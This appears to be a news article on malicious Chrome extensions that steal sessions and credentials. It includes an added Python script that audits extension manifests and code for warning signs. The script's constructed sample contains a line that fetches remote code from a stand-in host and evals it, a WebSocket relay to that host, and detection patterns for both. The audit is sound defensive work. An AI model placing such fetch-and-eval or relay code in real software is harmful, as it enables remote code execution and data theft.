How cybercriminals are exploiting the Chrome Web Store has become alarmingly clear, as security researchers have revealed more than 100 malicious extensions since February 2024 that have collectively compromised over 2.6 million users.
The fraudulent extensions, masquerading as legitimate tools from Fortinet, VPN providers, and YouTube utilities, have successfully deceived users by appearing on the official Chrome Web Store while harboring malicious code designed to steal sensitive data. These malicious browser tools primarily focus on session hijacking attacks.
These sophisticated attacks utilize multiple deception tactics, including the creation of convincing replica websites that mimic legitimate services. The attackers employed a consent phishing strategy to manipulate users into granting dangerous permissions through OAuth flows. While protection tools like AI-powered detection can help identify these threats, many users remain vulnerable without proper security measures.
Once installed, the malicious extensions exploit excessive permissions granted through manifest files to access users’ browser activities, credentials, and session data. Some extensions establish WebSocket connections to route traffic through attacker-controlled infrastructure, enabling continuous monitoring and data theft.
The scope of the problem extends beyond individual users to affect legitimate developers themselves.
Attackers have launched targeted phishing campaigns against extension developers, sending fraudulent emails that appear to come from the Chrome Web Store. These communications typically threaten extension removal unless immediate action is taken, successfully tricking developers into providing access credentials that allow attackers to upload malicious updates to otherwise trusted extensions.
The technical sophistication of these attacks is particularly concerning, as the malicious extensions employ various methods to evade detection.
Attackers utilize “onreset” event handlers and temporary DOM elements for code execution, while some extensions fetch and execute arbitrary scripts from remote servers. The compromises have persisted undetected for up to 18 months in some cases, targeting specific user bases such as banking customers and cryptocurrency users.
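A defender-side audit of the indicators this article names (excessive manifest permissions, remote script fetching, WebSocket channels to outside hosts, and onreset handlers) is shown below as an added example; it is not code from the article or from any extension it describes. The sample manifest and scripts are constructed, and the permission and pattern lists are assumptions about what is worth flagging for review.

```python
import json
import re

# Manifest permissions that expose cookies, tabs or traffic: the "excessive
# permissions" the article describes as the basis for session hijacking (assumed list).
SENSITIVE_PERMISSIONS = {"cookies", "webRequest", "webRequestBlocking",
                         "tabs", "scripting", "declarativeNetRequest"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Source indicators for the techniques named in the article (heuristics, not proof).
SOURCE_PATTERNS = {
    "remote_script_fetch": re.compile(r"fetch\s*\(\s*['\"]https?://"),
    "dynamic_eval": re.compile(r"\beval\b|\bnew\s+Function\b"),
    "onreset_handler": re.compile(r"\bonreset\b"),
    "websocket_channel": re.compile(r"new\s+WebSocket\s*\(\s*['\"]wss?://"),
}

def audit_extension(manifest_text, sources):
    """Return risky permissions from manifest.json and suspicious patterns per source file."""
    manifest = json.loads(manifest_text)
    perms = set(manifest.get("permissions", []))
    # MV2 listed host patterns under "permissions"; MV3 uses "host_permissions".
    hosts = perms | set(manifest.get("host_permissions", []))
    indicators = {}
    for path, code in sources.items():
        hits = sorted(name for name, rx in SOURCE_PATTERNS.items() if rx.search(code))
        if hits:
            indicators[path] = hits
    return {
        "sensitive_permissions": sorted(perms & SENSITIVE_PERMISSIONS),
        "broad_host_access": sorted(hosts & BROAD_HOSTS),
        "source_indicators": indicators,
    }

def verdict(findings):
    """'review' when broad data access is combined with remote code or exfil paths."""
    data_access = findings["sensitive_permissions"] and findings["broad_host_access"]
    return "review" if data_access and findings["source_indicators"] else "low"

# Constructed sample extension (not a real listing); example.invalid is a reserved name.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Sample VPN Helper", "version": "1.0",
    "permissions": ["cookies", "storage", "tabs"],
    "host_permissions": ["<all_urls>"],
})
SAMPLE_SOURCES = {
    "bg.js": "const ws = new WebSocket('wss://example.invalid/relay');\n"
             "fetch('https://example.invalid/update.js').then(r => r.text()).then(eval);",
    "content.js": "const f = document.createElement('form'); f.onreset = init;",
}
```

Run `audit_extension(SAMPLE_MANIFEST, SAMPLE_SOURCES)` and pass the result to `verdict` to see the sample flagged for review; on a real extension, feed it the unpacked manifest.json and script files.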
The impact of these attacks has been substantial, with a single campaign affecting 33 unique extensions and potentially exposing millions of users’ sensitive information, including banking credentials and enterprise access tokens.
The ability of attackers to push malicious updates through official channels has made even cautious users vulnerable to these sophisticated deception campaigns.